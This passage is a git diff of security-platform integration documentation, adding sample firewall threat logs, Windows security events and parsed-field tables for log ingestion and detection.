client\",\"SequenceNo\":7117268851537282868,\"SourceLocation\":\"10.0.0.0-10.255.255.255\",\"DestinationLocation\":\"CN\",\"PacketID\":0,\"FileHash\":\"adc83b19e793491b1c6ea0fd8b46cd9f32e592fc\",\"ApplianceOrCloud\":\"wildfire.paloaltonetworks.com\\u0000\",\"URLCounter\":1,\"FileType\":\"pe\",\"SenderEmail\":null,\"EmailSubject\":null,\"RecipientEmail\":null,\"ReportID\":33333333333,\"DGHierarchyLevel1\":997,\"DGHierarchyLevel2\":738,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"MyDevice\",\"SourceUUID\":null,\"DestinationUUID\":null,\"IMSI\":0,\"IMEI\":null,\"ParentSessionID\":0,\"ParentStarttime\":\"1970-01-01T00:00:00.000000Z\",\"Tunnel\":\"N/A\",\"ThreatCategory\":\"unknown\",\"ContentVersion\":\"0\",\"SigFlags\":\"0x0\",\"RuleUUID\":\"50afdf91-0d37-4729-8052-1382912d9895\",\"HTTP2Connection\":0,\"DynamicUserGroupName\":null,\"X-Forwarded-ForIP\":null,\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"HostID\":null,\"EndpointSerialNumber\":\"xxxxxxxxxxx\",\"DomainEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"PartialHash\":0,\"TimeGeneratedHighResolution\":\"2023-05-30T06:52:14.052000Z\",\"NSSAINetworkSliceType\":null}\n", "event": { + "action": "block", "category": [ "malware" ], @@ -4066,6 +4474,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "ip": "5.6.7.8", "nat": { + "ip": "8.7.6.5", "port": 80 }, "port": 80 @@ -4115,9 +4524,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "related": { "ip": [ "1.2.3.4", - "5.6.7.8" + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" ], "user": [ + "example.org", "john.doe@example.org" ] }, @@ -4129,6 +4541,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "address": "1.2.3.4", "ip": "1.2.3.4", "nat": { + "ip": "4.3.2.1", "port": 40114 }, "port": 55555, @@ -4137,7 +4550,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I } }, "user": { - "name": "john.doe@example.org" + "domain": "john.doe", + "email": "john.doe@example.org", + "name": "example.org" } } @@ -4165,6 +4580,7 @@ The following table lists the fields that are extracted, normalized under the EC |`destination.nat.port` | `long` | Destination NAT Port | |`destination.packets` | `long` | Packets sent from the destination to the source. | |`destination.port` | `long` | Port of the destination. | +|`destination.user.domain` | `keyword` | Name of the directory the user is a member of. | |`destination.user.name` | `keyword` | Short name or login of the user. | |`email.from.address` | `keyword` | Email address from | |`email.subject` | `keyword` | Subject | @@ -4195,6 +4611,7 @@ The following table lists the fields that are extracted, normalized under the EC |`log.logger` | `keyword` | Name of the logger. | |`network.application` | `keyword` | Application level protocol name. | |`network.bytes` | `long` | Total bytes transferred in both directions. | +|`network.forwarded_ip` | `ip` | Host IP address when the source IP address is the proxy. | |`network.packets` | `long` | Total packets transferred in both directions. | |`network.protocol` | `keyword` | Application protocol name. | |`network.transport` | `keyword` | Protocol Name corresponding to the field `iana_number`. | @@ -4226,7 +4643,15 @@ The following table lists the fields that are extracted, normalized under the EC |`source.nat.port` | `long` | Source NAT port | |`source.packets` | `long` | Packets sent from the source to the destination. | |`source.port` | `long` | Port of the source. | +|`source.user.domain` | `keyword` | Name of the directory the user is a member of. | |`source.user.name` | `keyword` | Short name or login of the user. | +|`url.domain` | `keyword` | Domain of the url. | +|`url.original` | `wildcard` | Unmodified original url as seen in the event source. | +|`url.path` | `wildcard` | Path of the request, such as "/search". | +|`url.port` | `long` | Port of the request, such as 443. | +|`url.query` | `keyword` | Query string of the request. | +|`user.domain` | `keyword` | Name of the directory the user is a member of. | +|`user.email` | `keyword` | User email address. | |`user.name` | `keyword` | Short name or login of the user. | |`user_agent.name` | `keyword` | Name of the user agent. | |`user_agent.os.name` | `keyword` | Operating system name, without the version. | diff --git a/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd_sample.md b/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd_sample.md index 0a12572b3a..db40769711 100644 --- a/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd_sample.md +++ b/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd_sample.md @@ -122,6 +122,208 @@ In this section, you will find examples of raw logs as generated natively by the +=== "network_threat_alert_1" + + + ```json + { + "TimeReceived": "2024-06-25T21:32:54.000000Z", + "DeviceSN": "000011111112222", + "LogType": "THREAT", + "Subtype": "url", + "ConfigVersion": "10.2", + "TimeGenerated": "2024-06-25T21:30:00.000000Z", + "SourceAddress": "1.2.3.4", + "DestinationAddress": "5.6.7.8", + "NATSource": "4.3.2.1", + "NATDestination": "8.7.6.5", + "Rule": "Rule124", + "SourceUser": null, + "DestinationUser": null, + "Application": "ssl", + "VirtualLocation": "vsys1", + "FromZone": "INSIDE", + "ToZone": "OUTSIDE", + "InboundInterface": "ethernet1/2", + "OutboundInterface": "ethernet1/1", + "LogSetting": "Panorama_CDL", + "SessionID": 155600, + "RepeatCount": 1, + "SourcePort": 51501, + "DestinationPort": 443, + "NATSourcePort": 63989, + "NATDestinationPort": 443, + "Protocol": "tcp", + "Action": "alert", + "URL": "www.example.org", + "URLCategory": "computer-and-internet-info", + "VendorSeverity": "Informational", + "DirectionOfAttack": "client to server", + "SequenceNo": 7353954110769176067, + "SourceLocation": "AZURE-EU-WEST-CBS-BELLEM", + "DestinationLocation": "NL", + "ContentType": null, + "PacketID": 0, + "URLCounter": 0, + "UserAgent": null, + "X-Forwarded-For": null, + "Referer": null, + "DGHierarchyLevel1": 982, + "DGHierarchyLevel2": 117, + "DGHierarchyLevel3": 0, + "DGHierarchyLevel4": 0, + "VirtualSystemName": "", + "DeviceName": "DN-EUWEST-F2", + "SourceUUID": null, + "DestinationUUID": null, + "HTTPMethod": "unknown", + "IMSI": 0, + "IMEI": null, + "ParentSessionID": 0, + "ParentStarttime": "1970-01-01T00:00:00.000000Z", + "Tunnel": "N/A", + "InlineMLVerdict": "unknown", + "ContentVersion": "0", + "SigFlags": 0, + "HTTPHeaders": null, + "URLCategoryList": "computer-and-internet-info,low-risk", + "RuleUUID": "cbc3bd5d-e54c-48d7-a6c7-8710bf593e7c", + "HTTP2Connection": 0, + "DynamicUserGroupName": null, + "X-Forwarded-ForIP": null, + "SourceDeviceCategory": null, + "SourceDeviceProfile": null, + "SourceDeviceModel": null, + "SourceDeviceVendor": null, + "SourceDeviceOSFamily": null, + "SourceDeviceOSVersion": null, + "SourceDeviceHost": null, + "SourceDeviceMac": null, + "DestinationDeviceCategory": null, + "DestinationDeviceProfile": null, + "DestinationDeviceModel": null, + "DestinationDeviceVendor": null, + "DestinationDeviceOSFamily": null, + "DestinationDeviceOSVersion": null, + "DestinationDeviceHost": null, + "DestinationDeviceMac": null, + "ContainerID": null, + "ContainerNameSpace": null, + "ContainerName": null, + "SourceEDL": null, + "DestinationEDL": null, + "HostID": null, + "EndpointSerialNumber": null, + "SourceDynamicAddressGroup": null, + "DestinationDynamicAddressGroup": null, + "TimeGeneratedHighResolution": "2024-06-25T21:30:00.103000Z", + "NSSAINetworkSliceType": null + } + ``` + + + +=== "network_threat_alert_2" + + + ```json + { + "TimeReceived": "2024-06-25T21:30:08.000000Z", + "DeviceSN": "no-serial", + "LogType": "THREAT", + "Subtype": "url", + "ConfigVersion": "10.2", + "TimeGenerated": "2024-06-25T21:30:00.000000Z", + "SourceAddress": "1.2.3.4", + "DestinationAddress": "5.6.7.8", + "NATSource": "4.3.2.1", + "NATDestination": "8.7.6.5", + "Rule": "Global_Internet_Network_Awareness_Service", + "SourceUser": "jdoe@example.org", + "DestinationUser": null, + "Application": "web-browsing", + "VirtualLocation": "vsys1", + "FromZone": "ZR-EUWS-1", + "ToZone": "untrust", + "InboundInterface": "tunnel.107", + "OutboundInterface": "ethernet1/1", + "LogSetting": "default", + "SessionID": 1787364, + "RepeatCount": 1, + "SourcePort": 53610, + "DestinationPort": 80, + "NATSourcePort": 36160, + "NATDestinationPort": 80, + "Protocol": "tcp", + "Action": "alert", + "URL": "www.example.com/connecttest.txt", + "URLCategory": "computer-and-internet-info", + "VendorSeverity": "Informational", + "DirectionOfAttack": "client to server", + "SequenceNo": 7372845116442397960, + "SourceLocation": "10.0.0.0-10.255.255.255", + "DestinationLocation": "US", + "ContentType": "text/plain", + "PacketID": 0, + "URLCounter": 1, + "UserAgent": "Microsoft NCSI", + "X-Forwarded-For": null, + "Referer": null, + "DGHierarchyLevel1": 463, + "DGHierarchyLevel2": 525, + "DGHierarchyLevel3": 0, + "DGHierarchyLevel4": 0, + "VirtualSystemName": "", + "DeviceName": "ZR-EUWS-1", + "SourceUUID": null, + "DestinationUUID": null, + "HTTPMethod": "get", + "IMSI": 0, + "IMEI": null, + "ParentSessionID": 0, + "ParentStarttime": "1970-01-01T00:00:00.000000Z", + "Tunnel": "N/A", + "InlineMLVerdict": "unknown", + "ContentVersion": "0", + "SigFlags": 0, + "HTTPHeaders": null, + "URLCategoryList": ".msftconnecttest.com,computer-and-internet-info,low-risk", + "RuleUUID": "481a523a-44c0-4c37-b2d5-b6b541d775c3", + "HTTP2Connection": 0, + "DynamicUserGroupName": null, + "X-Forwarded-ForIP": null, + "SourceDeviceCategory": null, + "SourceDeviceProfile": null, + "SourceDeviceModel": null, + "SourceDeviceVendor": null, + "SourceDeviceOSFamily": null, + "SourceDeviceOSVersion": null, + "SourceDeviceHost": null, + "SourceDeviceMac": null, + "DestinationDeviceCategory": null, + "DestinationDeviceProfile": null, + "DestinationDeviceModel": null, + "DestinationDeviceVendor": null, + "DestinationDeviceOSFamily": null, + "DestinationDeviceOSVersion": null, + "DestinationDeviceHost": null, + "DestinationDeviceMac": null, + "ContainerID": null, + "ContainerNameSpace": null, + "ContainerName": null, + "SourceEDL": null, + "DestinationEDL": null, + "HostID": null, + "EndpointSerialNumber": null, + "SourceDynamicAddressGroup": null, + "DestinationDynamicAddressGroup": null, + "TimeGeneratedHighResolution": "2024-06-25T21:30:00.778000Z", + "NSSAINetworkSliceType": null + } + ``` + + + === "sctp_cef" @@ -1255,6 +1457,15 @@ In this section, you will find examples of raw logs as generated natively by the +=== "threat-url-xff" + + + ```json + 1,2024/03/12 15:02:32,016401004874,THREAT,url,2816,2024/03/12 15:02:32,10.0.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule-internet,x-fwd-for: 11.22.33.44,,web-browsing,vsys,env,zone2,a1.1,aec.2,default,2024/03/12 15:02:32,1384927,1,49802,80,0,0,0x8b000,tcp,alert,"www.sekoia.io:443/catalog/integrations?query=this",(9999),any,informational,client-to-server,7324220311048193508,0x0,10.0.0.0-10.255.255.255,192.168.0.0-192.168.255.255,,,0,,,10,Mozilla/4.0 (compatible; ms-office; MSOffice 16),,"11.22.33.44",,,,,0,0,0,0,0,VSYS,FW,,,,get,0,,0,,N/A,N/A,AppThreat-0-0,0x0,0,4294967295,,"Sekoia,cybertech,low-risk",ea3431a2-6869-4d9f-ad41-1858d80b406c,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2024-03-12T15:02:32.650+01:00,,,,internet-utility,general-internet,browser-based,4,"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use",,web-browsing,no,no,,,NonProxyTraffic + ``` + + + === "threat_cef" diff --git a/_shared_content/operations_center/integrations/generated/9044ba46-2b5d-4ebd-878a-51d62e84c8df.md b/_shared_content/operations_center/integrations/generated/9044ba46-2b5d-4ebd-878a-51d62e84c8df.md index 5409a04cfd..c96eff10a7 100644 --- a/_shared_content/operations_center/integrations/generated/9044ba46-2b5d-4ebd-878a-51d62e84c8df.md +++ b/_shared_content/operations_center/integrations/generated/9044ba46-2b5d-4ebd-878a-51d62e84c8df.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "ack.json" diff --git a/_shared_content/operations_center/integrations/generated/916c13a8-c109-49f0-94db-d6a2300f5580.md b/_shared_content/operations_center/integrations/generated/916c13a8-c109-49f0-94db-d6a2300f5580.md index f543c854b7..6f58723739 100644 --- a/_shared_content/operations_center/integrations/generated/916c13a8-c109-49f0-94db-d6a2300f5580.md +++ b/_shared_content/operations_center/integrations/generated/916c13a8-c109-49f0-94db-d6a2300f5580.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_sample.json" diff --git a/_shared_content/operations_center/integrations/generated/9281438c-f7c3-4001-9bcc-45fd108ba1be.md b/_shared_content/operations_center/integrations/generated/9281438c-f7c3-4001-9bcc-45fd108ba1be.md index ea3de8b026..8af1c56fc1 100644 --- a/_shared_content/operations_center/integrations/generated/9281438c-f7c3-4001-9bcc-45fd108ba1be.md +++ b/_shared_content/operations_center/integrations/generated/9281438c-f7c3-4001-9bcc-45fd108ba1be.md @@ -30,7 +30,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "Event_1117.json" @@ -691,6 +691,93 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "Event_4738.json" + + ```json + + { + "message": "{\n \"EventTime\": \"2024-05-06 11:38:15\",\n \"Hostname\": \"server01.example.org\",\n \"Keywords\": -9214364837600034816,\n \"EventType\": \"AUDIT_SUCCESS\",\n \"SeverityValue\": 2,\n \"Severity\": \"INFO\",\n \"EventID\": 4738,\n \"SourceName\": \"Microsoft-Windows-Security-Auditing\",\n \"ProviderGuid\": \"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\n \"Version\": 0,\n \"Task\": 13824,\n \"OpcodeValue\": 0,\n \"RecordNumber\": 105098604,\n \"ProcessID\": 688,\n \"ThreadID\": 2676,\n \"Channel\": \"Security\",\n \"Message\": \"A user account was changed.\\r\\n\\r\\nSubject:\\r\\n\\tSecurity ID:\\t\\tS-1-5-7\\r\\n\\tAccount Name:\\t\\tANONYMOUS LOGON\\r\\n\\tAccount Domain:\\t\\tNT AUTHORITY\\r\\n\\tLogon ID:\\t\\t0x3E6\\r\\n\\r\\nTarget Account:\\r\\n\\tSecurity ID:\\t\\tS-1-5-21-1111111111-222222222-444444444-55555\\r\\n\\tAccount Name:\\t\\tjdoe\\r\\n\\tAccount Domain:\\t\\tEXAMPLE\\r\\n\\r\\nChanged Attributes:\\r\\n\\tSAM Account Name:\\t-\\r\\n\\tDisplay Name:\\t\\t-\\r\\n\\tUser Principal Name:\\t-\\r\\n\\tHome Directory:\\t\\t-\\r\\n\\tHome Drive:\\t\\t-\\r\\n\\tScript Path:\\t\\t-\\r\\n\\tProfile Path:\\t\\t-\\r\\n\\tUser Workstations:\\t-\\r\\n\\tPassword Last Set:\\t06.05.2024 11:38:15\\r\\n\\tAccount Expires:\\t\\t-\\r\\n\\tPrimary Group ID:\\t-\\r\\n\\tAllowedToDelegateTo:\\t-\\r\\n\\tOld UAC Value:\\t\\t-\\r\\n\\tNew UAC Value:\\t\\t-\\r\\n\\tUser Account Control:\\t-\\r\\n\\tUser Parameters:\\t-\\r\\n\\tSID History:\\t\\t-\\r\\n\\tLogon Hours:\\t\\t-\\r\\n\\r\\nAdditional Information:\\r\\n\\tPrivileges:\\t\\t-\",\n \"Category\": \"User Account Management\",\n \"Opcode\": \"Info\",\n \"Dummy\": \"-\",\n \"TargetUserName\": \"jdoe\",\n \"TargetDomainName\": \"EXAMPLE\",\n \"TargetSid\": \"S-1-5-21-1111111111-222222222-444444444-55555\",\n \"SubjectUserSid\": \"S-1-5-7\",\n \"SubjectUserName\": \"ANONYMOUS LOGON\",\n \"SubjectDomainName\": \"NT AUTHORITY\",\n \"SubjectLogonId\": \"0x3e6\",\n \"PrivilegeList\": \"-\",\n \"SamAccountName\": \"-\",\n \"DisplayName\": \"-\",\n \"UserPrincipalName\": \"-\",\n \"HomeDirectory\": \"-\",\n \"HomePath\": \"-\",\n \"ScriptPath\": \"-\",\n \"ProfilePath\": \"-\",\n \"UserWorkstations\": \"-\",\n \"PasswordLastSet\": \"06.05.2024 11:38:15\",\n \"AccountExpires\": \"-\",\n \"PrimaryGroupId\": \"-\",\n \"AllowedToDelegateTo\": \"-\",\n \"OldUacValue\": \"321\",\n \"NewUacValue\": \"123\",\n \"UserAccountControl\": \"-\",\n \"UserParameters\": \"-\",\n \"SidHistory\": \"-\",\n \"LogonHours\": \"-\",\n \"EventReceivedTime\": \"2024-05-06 11:38:16\",\n \"SourceModuleName\": \"SecurityLog\",\n \"SourceModuleType\": \"im_msvistalog\"\n}", + "event": { + "code": "4738", + "message": "A user account was changed.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-7\r\n\tAccount Name:\t\tANONYMOUS LOGON\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E6\r\n\r\nTarget Account:\r\n\tSecurity ID:\t\tS-1-5-21-1111111111-222222222-444444444-55555\r\n\tAccount Name:\t\tjdoe\r\n\tAccount Domain:\t\tEXAMPLE\r\n\r\nChanged Attributes:\r\n\tSAM Account Name:\t-\r\n\tDisplay Name:\t\t-\r\n\tUser Principal Name:\t-\r\n\tHome Directory:\t\t-\r\n\tHome Drive:\t\t-\r\n\tScript Path:\t\t-\r\n\tProfile Path:\t\t-\r\n\tUser Workstations:\t-\r\n\tPassword Last Set:\t06.05.2024 11:38:15\r\n\tAccount Expires:\t\t-\r\n\tPrimary Group ID:\t-\r\n\tAllowedToDelegateTo:\t-\r\n\tOld UAC Value:\t\t-\r\n\tNew UAC Value:\t\t-\r\n\tUser Account Control:\t-\r\n\tUser Parameters:\t-\r\n\tSID History:\t\t-\r\n\tLogon Hours:\t\t-\r\n\r\nAdditional Information:\r\n\tPrivileges:\t\t-", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "action": { + "id": 4738, + "name": "A user account was changed", + "outcome": "success", + "properties": { + "AllowedToDelegateTo": "-", + "Category": "User Account Management", + "DisplayName": "-", + "EventType": "AUDIT_SUCCESS", + "HomeDirectory": "-", + "Keywords": "-9214364837600034816", + "NewUAC": "123", + "OldUAC": "321", + "OpcodeValue": 0, + "PrivilegeList": "-", + "ProviderGuid": "{54849625-5478-4994-A5BA-3E3B0328C30D}", + "SamAccountName": "-", + "ScriptPath": "-", + "Severity": "INFO", + "SidHistory": "-", + "SourceName": "Microsoft-Windows-Security-Auditing", + "SubjectDomainName": "NT AUTHORITY", + "SubjectLogonId": "0x3e6", + "SubjectUserName": "ANONYMOUS LOGON", + "SubjectUserSid": "S-1-5-7", + "TargetDomainName": "EXAMPLE", + "TargetSid": "S-1-5-21-1111111111-222222222-444444444-55555", + "TargetUserName": "jdoe", + "Task": 13824, + "UserPrincipalName": "-" + }, + "record_id": 105098604, + "type": "Security" + }, + "host": { + "hostname": "server01.example.org", + "name": "server01.example.org" + }, + "log": { + "hostname": "server01.example.org", + "level": "info" + }, + "os": { + "family": "windows", + "platform": "windows" + }, + "process": { + "id": 688, + "pid": 688, + "thread": { + "id": 2676 + } + }, + "related": { + "hosts": [ + "server01.example.org" + ], + "user": [ + "ANONYMOUS LOGON" + ] + }, + "user": { + "domain": "NT AUTHORITY", + "id": "S-1-5-7", + "name": "ANONYMOUS LOGON", + "target": { + "domain": "EXAMPLE", + "name": "jdoe" + } + } + } + + ``` + + === "Event_4768.json" ```json @@ -830,10 +917,17 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "hosts": [ "HOSTFOO" ], + "ip": [ + "1.1.1.1" + ], "user": [ "USERFOO" ] }, + "source": { + "address": "1.1.1.1", + "ip": "1.1.1.1" + }, "user": { "domain": "HOSTFOO", "name": "USERFOO" @@ -843,6 +937,137 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "Event_4825_1.json" + + ```json + + { + "message": "{\n \"Hostname\": \"mars.example.org\",\n \"EventType\": \"AUDIT_FAILURE\",\n \"Severity\": \"ERROR\",\n \"EventID\": 4825,\n \"SourceName\": \"Microsoft-Windows-Security-Auditing\",\n \"ProcessID\": 632,\n \"Channel\": \"Security\",\n \"Message\": \"A user was denied the access to Remote Desktop. By default, users are allowed to connect only if they are members of the Remote Desktop Users group or Administrators group.\\r\\n\\r\\nSubject:\\r\\n\\tUser Name:\\tJDOE\\r\\n\\tDomain:\\t\\tEXAMPLE\\r\\n\\tLogon ID:\\t0xA360BC6B\\r\\n\\r\\nAdditional Information:\\r\\n\\tClient Address:\\t1.2.3.4\\r\\n\\r\\n\\r\\nThis event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\",\n \"Category\": \"Other Logon/Logoff Events\"\n}", + "event": { + "code": "4825", + "message": "A user was denied the access to Remote Desktop. By default, users are allowed to connect only if they are members of the Remote Desktop Users group or Administrators group.\r\n\r\nSubject:\r\n\tUser Name:\tJDOE\r\n\tDomain:\t\tEXAMPLE\r\n\tLogon ID:\t0xA360BC6B\r\n\r\nAdditional Information:\r\n\tClient Address:\t1.2.3.4\r\n\r\n\r\nThis event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.", + "outcome": "failure", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "action": { + "id": 4825, + "name": "A user was denied the access to Remote Desktop. By default, users are allowed to connect only if they are members of the Remote Desktop Users group or Administrators group", + "outcome": "failure", + "properties": { + "Category": "Other Logon/Logoff Events", + "EventType": "AUDIT_FAILURE", + "Severity": "ERROR", + "SourceName": "Microsoft-Windows-Security-Auditing" + }, + "type": "Security" + }, + "host": { + "hostname": "mars.example.org", + "name": "mars.example.org" + }, + "log": { + "hostname": "mars.example.org", + "level": "error" + }, + "os": { + "family": "windows", + "platform": "windows" + }, + "process": { + "id": 632, + "pid": 632 + }, + "related": { + "hosts": [ + "mars.example.org" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "JDOE" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "domain": "EXAMPLE", + "name": "JDOE" + } + } + + ``` + + +=== "Event_4886.json" + + ```json + + { + "message": "{\n \"EventTime\": \"2024-07-10 14:57:48\",\n \"Hostname\": \"FD001.example.org\",\n \"Keywords\": -9214364837600034816,\n \"EventType\": \"AUDIT_SUCCESS\",\n \"SeverityValue\": 2,\n \"Severity\": \"INFO\",\n \"EventID\": 4886,\n \"SourceName\": \"Microsoft-Windows-Security-Auditing\",\n \"ProviderGuid\": \"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\n \"Version\": 0,\n \"Task\": 12805,\n \"OpcodeValue\": 0,\n \"RecordNumber\": 4403229,\n \"ActivityID\": \"{47CB07C4-5532-467D-A89C-724B854B59F7}\",\n \"ProcessID\": 900,\n \"ThreadID\": 8040,\n \"Channel\": \"Security\",\n \"Message\": \"Certificate Services received a certificate request.\\r\\n\\t\\r\\nRequest ID:\\t2715945\\r\\nRequester:\\tEXAMPLE\\\\jdoe\\r\\nAttributes:\\t\\nCertificateTemplate:NDSEClient\\r\\n\\nccm:NDFR10923.example.org\",\n \"Category\": \"Certification Services\",\n \"Opcode\": \"Info\",\n \"RequestId\": \"2715945\",\n \"Requester\": \"EXAMPLE\\\\jdoe\",\n \"Attributes\": \"\\nCertificateTemplate:NDSEClient\\r\\n\\nccm:NDFR10923.example.org\",\n \"EventReceivedTime\": \"2024-07-10 14:57:50\",\n \"SourceModuleName\": \"SecurityLog\",\n \"SourceModuleType\": \"im_msvistalog\"\n}", + "event": { + "code": "4886", + "message": "Certificate Services received a certificate request.\r\n\t\r\nRequest ID:\t2715945\r\nRequester:\tEXAMPLE\\jdoe\r\nAttributes:\t\nCertificateTemplate:NDSEClient\r\n\nccm:NDFR10923.example.org", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "action": { + "id": 4886, + "name": "Certificate Services received a certificate request", + "outcome": "success", + "properties": { + "Attributes": "\nCertificateTemplate:NDSEClient\r\n\nccm:NDFR10923.example.org", + "Category": "Certification Services", + "EventType": "AUDIT_SUCCESS", + "Keywords": "-9214364837600034816", + "OpcodeValue": 0, + "ProviderGuid": "{54849625-5478-4994-A5BA-3E3B0328C30D}", + "Requester": "EXAMPLE\\jdoe", + "Severity": "INFO", + "SourceName": "Microsoft-Windows-Security-Auditing", + "Task": 12805 + }, + "record_id": 4403229, + "type": "Security" + }, + "host": { + "hostname": "FD001.example.org", + "name": "FD001.example.org" + }, + "log": { + "hostname": "FD001.example.org", + "level": "info" + }, + "os": { + "family": "windows", + "platform": "windows" + }, + "process": { + "id": 900, + "pid": 900, + "thread": { + "id": 8040 + } + }, + "related": { + "hosts": [ + "FD001.example.org" + ], + "user": [ + "jdoe" + ] + }, + "user": { + "domain": "EXAMPLE", + "name": "jdoe" + } + } + + ``` + + === "Event_4929.json" ```json @@ -1697,7 +1922,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "user": { "domain": "KEY", - "email": "firstname.lastname@example.org", "id": "S-1-5-21-0000000000-0000000000-0000000000-000000", "name": "" }, @@ -1782,7 +2006,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "user": { "domain": "KEY", - "email": "username@example.org", "id": "S-1-5-21-0000000000-0000000000-0000000000-000000", "name": "" }, @@ -1803,6 +2026,72 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "audit_cve.json" + + ```json + + { + "message": "{\"EventTime\":\"2024-07-06 02:20:36\",\"Hostname\":\"srv023.example.com\",\"Keywords\":-9223372036854775808,\"EventType\":\"WARNING\",\"SeverityValue\":3,\"Severity\":\"WARNING\",\"EventID\":1,\"SourceName\":\"Microsoft-Windows-Audit-CVE\",\"ProviderGuid\":\"{85A62A0D-7E17-485F-9D4F-749A287193A6}\",\"Version\":0,\"Task\":0,\"OpcodeValue\":0,\"RecordNumber\":606266,\"ProcessID\":2392,\"ThreadID\":2932,\"Channel\":\"Application\",\"Domain\":\"AUTORITE NT\",\"AccountName\":\"System\",\"UserID\":\"S-1-5-18\",\"AccountType\":\"User\",\"Message\":\"D\u00e9tection possible de CVE : [CVE-2020-158] cert chain exceeded limit\\r\\nInformations suppl\u00e9mentaires : Cert: sha1: ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC IssuerDepthCount: 13 Limit: 12\\r\\n\\r\\nCet \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 lorsqu\u2019une tentative d\u2019exploitation d\u2019une vuln\u00e9rabilit\u00e9 connue ([CVE-2020-158] cert chain exceeded limit) est d\u00e9tect\u00e9e.\\r\\nCet \u00e9v\u00e9nement est d\u00e9clench\u00e9 par un processus en mode utilisateur.\\r\\n\",\"Opcode\":\"Informations\",\"CVEID\":\"[CVE-2020-158] cert chain exceeded limit\",\"AdditionalDetails\":\"Cert: <CS.EXAMPLE.ORG> sha1: ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC IssuerDepthCount: 13 Limit: 12\",\"EventReceivedTime\":\"2024-07-06 